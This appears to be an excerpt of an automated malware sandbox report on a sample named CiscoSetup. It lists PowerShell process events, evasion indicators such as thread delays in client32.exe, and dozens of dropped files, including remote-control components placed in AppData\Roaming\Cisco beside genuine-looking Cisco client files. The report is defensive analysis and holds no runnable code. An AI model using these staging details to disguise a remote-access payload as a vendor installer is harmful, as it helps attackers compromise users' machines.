                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11069C0011_2_11069C00
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11069C9911_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689B91F011_2_689B91F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069C0012_2_11069C00
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069C9912_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle,11_2_11127110
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle,12_2_11127110
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9922Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWindow / User API: threadDelayed 387Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWindow / User API: threadDelayed 7650Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KBBQU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VLKE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RH114.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1MCPC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5LH8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BKRIV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q3KOA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-R0O6I.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3E159.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IQ59L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AC64O.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IGGJL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KEI9E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MTMR6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-4ES8I.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-8PPEF.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-KVJK8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\is-HMVS5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-QS498.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-C05BP.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KNT8U.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OFTU2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-SHB4H.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T5R7J.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1IOCC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FBE8U.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-QHSOL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-GT7EB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-FVJ6D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LQ9L3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5841.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-6U0C3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2OKLO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FJD72.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UHIQE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q5QKO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-DLGKK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E1C9T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2UOIT.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D3PAV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8FFCG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8SET5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D1NAI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-LRKED.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EKIDE.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AQJIS.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KL0N9.tmpJump to dropped file
